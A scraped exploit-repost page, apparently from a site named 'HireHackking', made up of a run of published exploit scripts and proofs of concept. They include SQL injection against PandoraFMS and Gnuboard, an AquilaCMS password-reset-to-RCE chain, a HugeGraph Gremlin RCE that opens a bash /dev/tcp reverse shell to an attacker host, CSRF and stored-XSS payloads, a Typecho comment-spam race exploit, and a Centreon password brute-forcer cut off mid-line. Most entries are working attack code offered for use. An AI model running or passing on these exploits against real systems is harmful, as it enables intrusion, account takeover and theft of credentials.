Domain+"/backend/reset_password" final_headers = { 'Accept': 'application/json', 'Content-Type': 'application/json', 'X-Xsrf-Token': xsrf_token, } final_cookies = { '_lic_engine_session': lic_engine_session, 'XSRF-TOKEN': xsrf_token, } final_payload = { 'uid': Username, 'auth_token': auth_token, 'password': password, 'password_confirmation': password, 'common_name': '' } final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False) response_text = final_post_response.text if "OK" in response_text: print("[+] Password Successfully Changed!") print("[+] Username: "+Username) print("[+] New Password: "+password) else: print("[!] Something Went Wrong") print(response_text)
HireHackking

PandoraFMS 7.0NG.772 - SQL Injection

HACKER · %s · %s

# Exploit Title: PandoraFMS 7.0NG.772 - SQL Injection # Date: 21/11/2023 # Exploit Author: Osama Yousef # Vendor Homepage: https://pandorafms.com/ # Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz # Version: v7.0NG.772 # Tested on: Linux # CVE : CVE-2023-44088 import re, requests, argparse, string, random, base64 import urllib3 import html headers = { 'Cache-Control': 'max-age=0', 'Origin': '', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36', 'Accept': '*/*', 'Referer': '' } def login(session, url, username, password): res = session.get(url) csrf = retrieve_csrftoken(res.text) url+= '?login=1' payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}" res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'}) if 'User is blocked' in res.text: print("Login Failed!") exit(1) def exploit(session, url, imagepath, query): url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data" name = random_id(10) payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query) payload=payload.replace(' ', '\t') files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')} # Create a reference to the original _make_request method urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request # Replace the _make_request method with the custom_make_request function urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'}) if 'Created successfully' not in res.text: print("Failed to create a visual console!") exit(1) url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder" res = session.get(url2) x = re.search('(?:<a href=".*">)'+name, res.text) match = x.group() url3 = match.lstrip("<a href=") url3 = url3.split('"')[1] url3 = url3.split("?")[1] url3 = html.unescape(url3) url4 = url+ "?" + url3 res = session.get(url4) x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text) match = x.group() output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"') output = output.split('","backgroundImage')[0] print("Query output: {}".format(output)) def retrieve_csrftoken(response): x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden" value=")[a-zA-Z0-9]*(?:")', response) match = x.group() csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden" value="').rstrip('"') print("CSRF: {}".format(csrf)) return csrf def random_id(len): chars = string.ascii_uppercase + string.ascii_lowercase + string.digits return ''.join(random.choice(chars) for _ in range(len)) def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw): body = httplib_request_kw['body'] if body: body = body.replace(b"%09", b"\t"*3) httplib_request_kw['body'] = body return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw) def main(): ap = argparse.ArgumentParser() ap.add_argument("-t", "--target", required=True, help="Target URI") ap.add_argument("-u", "--username", required=True, help="Username") ap.add_argument("-p", "--password", required=True, help="Password") ap.add_argument("-i", "--image", required=True, help="Image path") ap.add_argument("-q", "--query", required=True, help="SQL Query to execute") ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)") args = vars(ap.parse_args()) session = requests.Session() url = args['target'] if 'pandora_console' not in url: if not url.endswith('/'): url += '/' url += 'pandora_console/' headers['Origin'] = args['target'] headers['Referer'] = args['target'] session.headers.update(headers) proxies = {} if args['proxy'] is not None: if 'https' in args['proxy']: proxies['https'] = args['proxy'] else: proxies['http'] = args['proxy'] session.proxies.update(proxies) login(session, url, args['username'], args['password']) exploit(session, url, args['image'], args['query']) if __name__=='__main__': main()
HireHackking

Typecho 1.3.0 - Race Condition

HACKER · %s · %s

# Exploit Title: Typecho 1.3.0 - Race Condition # Google Dork: intext:"Powered by Typecho" inurl:/index.php # Date: 18/08/2024 # Exploit Author: Michele 'cyberaz0r' Di Bonaventura # Vendor Homepage: https://typecho.org # Software Link: https://github.com/typecho/typecho # Version: 1.3.0 # Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho) # CVE: CVE-2024-35539 # For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/ package main import ( "bytes" "fmt" "io" "net/http" "net/url" "os" "strings" "sync" "sync/atomic" "time" "github.com/robertkrimen/otto" ) var ( c int32 = 0 commentsPostInterval int64 = 60 maxThreads int = 1000 wg sync.WaitGroup userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" client *http.Client = &http.Client{ CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse }, } ) func getJSFunction(u string) string { req, err := http.NewRequest("GET", u, nil) if err != nil { fmt.Println("[X] Error creating initial request:", err) return "" } req.Header.Set("User-Agent", userAgent) resp, err := client.Do(req) if err != nil { fmt.Println("[X] Error sending initial request:", err) return "" } buf := new(bytes.Buffer) buf.ReadFrom(resp.Body) body := buf.String() if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") { fmt.Println("[X] Error finding JavaScript function") return "" } jsFunction := strings.Split(body, "input.value = (")[1] jsFunction = strings.Split(jsFunction, ")();;")[0] return jsFunction } func executeJavaScript(jsFunctionName string, jsFunctionBody string) string { vm := otto.New() _, err := vm.Run(jsFunctionBody) if err != nil { fmt.Println("[X] Error executing JavaScript function:", err) return "" } result, err := vm.Call(jsFunctionName, nil) if err != nil { fmt.Println("[X] Error calling JavaScript function:", err) return "" } returnValue, err := result.ToString() if err != nil { fmt.Println("[X] Error converting JavaScript result to string:", err) return "" } return returnValue } func spamComments(u string, formToken string) { timestamp := time.Now().Unix() for { i := 0 for time.Now().Unix() < timestamp-1 { time.Sleep(250 * time.Millisecond) fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1) } fmt.Printf("\n") for time.Now().Unix() < timestamp+2 { if i < maxThreads { wg.Add(1) go spamRequest(u, formToken, i) i++ } } wg.Wait() fmt.Printf("\n[+] Successfully spammed %d comments\n", c) timestamp = time.Now().Unix() + commentsPostInterval } } func spamRequest(u string, formToken string, i int) { fmt.Printf("\r[*] Spamming comment request %d ", i) defer wg.Done() formData := url.Values{} formData.Set("_", formToken) formData.Set("author", fmt.Sprintf("user_%d", i)) formData.Set("mail", fmt.Sprintf("user%d@test.example", i)) formData.Set("text", fmt.Sprintf("Hello from user_%d", i)) req, err := http.NewRequest("POST", u+"comment", nil) if err != nil { return } req.Header.Set("Referer", u) req.Header.Set("User-Agent", userAgent) req.Header.Set("Content-Type", "application/x-www-form-urlencoded") req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) req.Body = io.NopCloser(strings.NewReader(formData.Encode())) resp, err := client.Do(req) if err != nil { return } if resp.StatusCode == 302 { atomic.AddInt32(&c, 1) } defer resp.Body.Close() } func main() { if len(os.Args) != 2 { fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>") return } fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r") targetUrl := os.Args[1] fmt.Println("[+] Spam target:", targetUrl) fmt.Println("[*] Getting JavaScript function to calculate form token...") jsFunction := getJSFunction(targetUrl) if jsFunction == "" { fmt.Println("[-] Could not get JavaScript function, exiting...") return } fmt.Println("[*] Evaluating JavaScript function to calculate form token...") formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1)) if formToken == "" { fmt.Println("[-] Could not get form token, exiting...") return } fmt.Printf("[+] Form token: %s", formToken) spamComments(targetUrl, formToken) }
HireHackking

AquilaCMS 1.409.20 - Remote Command Execution (RCE)

HACKER · %s · %s

# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) # Date: 2024-10-25 # Exploit Author: Eui Chul Chung # Vendor Homepage: https://www.aquila-cms.com/ # Software Link: https://github.com/AquilaCMS/AquilaCMS # Version: v1.409.20 # CVE: CVE-2024-48572, CVE-2024-48573 import io import json import uuid import string import zipfile import argparse import requests import textwrap def unescape_special_characters(email): return ( email.replace("[$]", "$") .replace("[*]", "*") .replace("[+]", "+") .replace("[-]", "-") .replace("[.]", ".") .replace("[?]", "?") .replace(r"[\^]", "^") .replace("[|]", "|") ) def get_user_emails(): valid_characters = list( string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~" ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"] emails_found = [] next_emails = ["^"] while next_emails: prev_emails = next_emails next_emails = [] for email in prev_emails: found = False for ch in valid_characters: data = {"email": f"{email + ch}.*"} res = requests.put(f"{args.url}/api/v2/user", json=data) if json.loads(res.text)["code"] == "UserAlreadyExist": next_emails.append(email + ch) found = True if not found: emails_found.append(email[1:]) print(f"[+] {unescape_special_characters(email[1:])}") return emails_found def reset_password(email): data = {"email": email} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) data = {"token": {"$ne": None}, "password": args.password} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) print(f"[+] {unescape_special_characters(email)} : {args.password}") def get_admin_auth_token(emails): for email in emails: data = {"username": email, "password": args.password} res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data) if res.status_code == 200: print(f"[+] Administrator account : {unescape_special_characters(email)}") return json.loads(res.text)["data"] return None def create_plugin(plugin_name): payload = textwrap.dedent( f""" const {{ exec }} = require("child_process"); /** * This function is called when the plugin is desactivated or when we delete it */ module.exports = async function (resolve, reject) {{ try {{ exec("{args.command}"); return resolve(); }} catch (error) {{}} }}; """ ).strip() plugin = io.BytesIO() with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file: zip_file.writestr( f"{plugin_name}/package.json", io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(), ) zip_file.writestr( f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue() ) zip_file.writestr( f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue() ) plugin.seek(0) return plugin def rce(emails): auth_token = get_admin_auth_token(emails) if auth_token is None: print("[-] Administrator account not found") return print("[+] Create malicious plugin") plugin_name = uuid.uuid4().hex plugin = create_plugin(plugin_name) print("[+] Upload plugin") headers = {"Authorization": auth_token} files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")} requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files) print("[+] Find uploaded plugin") headers = {"Authorization": auth_token} data = {"PostBody": {"limit": 0}} res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data) plugin_id = None for data in json.loads(res.text)["datas"]: if data["name"] == plugin_name: plugin_id = data["_id"] print(f"[+] Plugin ID : {plugin_id}") break if plugin_id is None: print("[-] Plugin not found") return print("[+] Deactivate plugin") headers = {"Authorization": auth_token} data = {"idModule": plugin_id, "active": False} res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data) if res.status_code == 200: print("[+] Command execution succeeded") else: print("[-] Command execution failed") def main(): print("[*] Retrieve email addresses") emails = get_user_emails() print("\n[*] Reset password") for email in emails: reset_password(email) print("\n[*] Perform remote code execution") rce(emails) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-u", dest="url", help="Site URL (e.g. www.aquila-cms.com)", type=str, required=True, ) parser.add_argument( "-p", dest="password", help="Password to use for password reset (e.g. HaXX0r3d!)", type=str, default="HaXX0r3d!", ) parser.add_argument( "-c", dest="command", help="Command to execute (e.g. touch /tmp/pwned)", type=str, default="touch /tmp/pwned", ) args = parser.parse_args() main()
HireHackking

flatCore 1.5 - Cross Site Request Forgery (CSRF)

HACKER · %s · %s

# Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/flatCore/flatCore-CMS # Software Link: https://github.com/flatCore/flatCore-CMS # Version: d3a5168 # Tested on: Ubuntu Windows # CVE : CVE-2019-13961 PoC: <!DOCTYPE html> <html> <head> <title>CSRF PoC</title> </head> <body> <form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="upload_destination" value="../content/files"> <input type="hidden" name="w" value="800"> <input type="hidden" name="h" value="600"> <input type="hidden" name="fz" value="1000"> <input type="hidden" name="unchanged" value="yes"> <input type="file" name="file" value="test.php"> <input type="submit" value="Upload"> </form> </body> </html> [Replace Your Domain Name]
HireHackking

Gnuboard5 5.3.2.8 - SQL Injection

HACKER · %s · %s

# Exploit Title: Gnuboard5 5.3.2.8 - SQL Injection # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/gnuboard/gnuboard5 # Software Link: https://github.com/gnuboard/gnuboard5 # Version: 5.3.2.8 # Tested on: Ubuntu Windows # CVE : CVE-2020-18662 PoC: 1) POST /install/install_db.php HTTP/1.1 Host: gnuboard Content-Type: application/x-www-form-urlencoded Content-Length: 100 mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)# result: sleep 5s. 2) curl -X POST http://gnuboard/install/install_db.php \ -d "mysql_user=root" \ -d "mysql_pass=password" \ -d "mysql_db=gnuboard_db" \ -d "table_prefix=' OR 1=1--" result: The application does not work. [Replace Your Domain Name and Replace Database Information]
HireHackking

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://hugegraph.apache.org/docs/download/download/ # Version: Apache HugeGraph 1.0.0 - 1.2.0 # CVE : CVE-2024–27348 from requests import Request, Session import sys import json def title(): print(''' ______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___ / ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ ) | | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \ | |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) | \____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/ [+] Reverse shell Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py ''') def exploit(url, lhost, lport): payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} headers = { 'Content-Type': 'application/json'} s = Session() url = url + "/gremlin" req = Request('POST', url, json=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) print(prepped.headers) print(url) print(resp.headers) print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])
HireHackking
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of Privilege Vulnerability # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/ad-manager/ # Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409 # Version: ADManager Plus Build < 7210 # Tested against: Build 7203 # CVE: CVE-2024-24409 # Description The Modify Computers is a predefined role in ADManager for managing computers. If a technician user has the Modify Computers privilege over a computer can change the userAccountControl and msDS-AllowedToDelegateTo attributes of the computer object. In this way, the technician user can set Constrained Kerberos Delegation over any computer within the Organizational Unit that the user was delegated. Contrary to what ADManager claims the user who has the Modify Computers role can change the privilege of computer objects in the Active Directory. The Constrained Kerberos Delegation can be set for any service such as CIFS, LDAP, HOST services. Then the user can access these services by abusing the Constrained Kerberos Delegation. In addition, the Unconstrained Kerberos Delegation can be set over the computer objects by changing the userAccountControl attribute. Normally, only users that have SeEnableDelegationPrivilege privilege can set constrained kerberos delegation. Only members of the BUILTIN\Administrators group have this privilege by default. The delegated user for an Organizational Unit can not set constrained kerberos delegation even if a user has the GenericAll right over a computer account, so the delegation process in Active Directory does not grant this privilege. However, the technician user can use the SeEnableDelegationPrivilege right via the Modify Computers role. # Vulnerability reasons 1. ADMP Web App Authorization issue: Assigning a predefined Modify Computers role delegates the technician user to modify custom attributes of computers unexpectedly. Even though it appears that this privilege is not granted in the UI, the Additional Custom Attribute property is assigned and this leads to broken access control vulnerability. 2. There is no restriction for editing the userAccountControl and msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP application performs changes with domain admin privileges as designed so that if we can bypass some restrictions (e.g. format of attribute value), our requests are applied with domain admin privileges. This way we can edit the attributes userAccountControl and msDS-AllowedToDelegateTo. # Impact A technician user elevates privileges from Domain User to Domain Admin. For example, the user can set Constrained Kerberos Delegation over CLIENT1$ for the CIFS service of the domain controller and access the CIFS service. As a result, the user is delegated to manage CLIENT1$ but he can access the CIFS service of the domain controller impersonating a user unexpectedly. # Proof Of Concept https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
HireHackking

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) # Date: 8-7-2024 # Category: Web Application # Exploit Author: Jeremia Geraldi Sihombing # Version: 2.10.1 # Tested on: Windows # CVE: CVE-2024-39143 Description: ---------------- A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered.. Steps to reproduce ------------------------- 1. Login as a low privilege user with property edit capability. 2. Create or Edit one of the user owned property (We can user the default property owned by the user). 3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not. Vulnerable parameter name: property[property_description][content] Example Payload: <img src="x" onerror="alert(document.cookie)"> 4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account. Burp Request ------------------- POST /en/user/property/7/edit HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1111 Origin: http://localhost Connection: keep-alive Referer: http://localhost/en/user/property/7/edit Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u=1 property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
HireHackking
# Exploit Title: PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) # Date: 2024-07-01 # Exploit Author: Vuln Seeker Cybersecurity Team # Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/ # Version: <= 1.0.5 # Tested on: Firefox # Contact me: vulns@vulnseeker.org The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. Proof of concept: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:10003 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1093 Origin: http://localhost:10003 Sec-GPC: 1 Connection: close Cookie: Cookie action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1 CSRF Exploit: <html> <body> <form action="http://localhost:10003/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="pzfm_upload_avatar" /> <input type="hidden" name="imageData" value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg==" /> <input type="hidden" name="userID" value="1"" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> Profile picture of user 1 will be changed in the dashboard http://localhost:10003/dashboard/?dashboard=profile Reference: https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/
HireHackking

Centron 19.04 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title : Centron 19.04 - Remote Code Execution (RCE) # Tested on Centreon API 19.04.0 # Centreon 19.04 - Login Password Bruteforcer # Written on 6 Nov 2019 # Referencing API Authentication of the Centreon API document # Author: st4rry # centbruteon.py # Centreon Download Link: https://download.centreon.com/#version-Older # Dependencies: sys, requests, argparse, termcolor, os #!/usr/bin/env python3 import sys import requests import argparse from termcolor import colored import os def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', dest='host', help='Define your target URL', required=True) parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80) parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP') parser.add_argument('-l', dest='username', help='Specific username') parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist') parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True) parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification') parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle') if len(sys.argv) == 1: parser.print_help(sys.stderr) sys.exit(1) args = parser.parse_args() protocol = 'https' if args.https else 'http' server = f"{protocol}://{args.host}:{args.port}" user = args.username passfile = args.passwfile.read().splitlines() userfile = args.userfile dirlo = '/centreon/api/index.php?action=authenticate' verify_ssl = not args.insecure if args.ca_bundle: verify_ssl = args.ca_bundle if user: brute_force_single_user(server, user, passfile, dirlo, verify_ssl) elif userfile: usrwl = userfile.read().splitlines() brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl) else: print(colored('Something went wrong!', 'red')) sys.exit(1) def brute_force_single_user(server, user, passfile, dirlo, verify_ssl): for password in passfile: data = {'username': user, 'password': password} r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) try: print('Processing...') print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(user, 'yellow') + colored(' Password: ', 'yellow') + colored(password, 'yellow')) if r.status_code == 200: print(colored('Credentials found: username: ', 'green') + colored(user, 'green') + colored(' password: ', 'green') + colored(password, 'green') + colored(' server: ', 'green') + colored(server, 'green')) print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) print('\n') break else: print(colored('403 - Unauthenticated!', 'red')) except IndexError: print(colored('Something went wrong', 'red')) def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl): for usr in usrwl: for password in passfile: data = {'username': usr, 'password': password} r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) try: print('Processing...') print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + colored(' Username: ', 'yellow') + colored(usr, 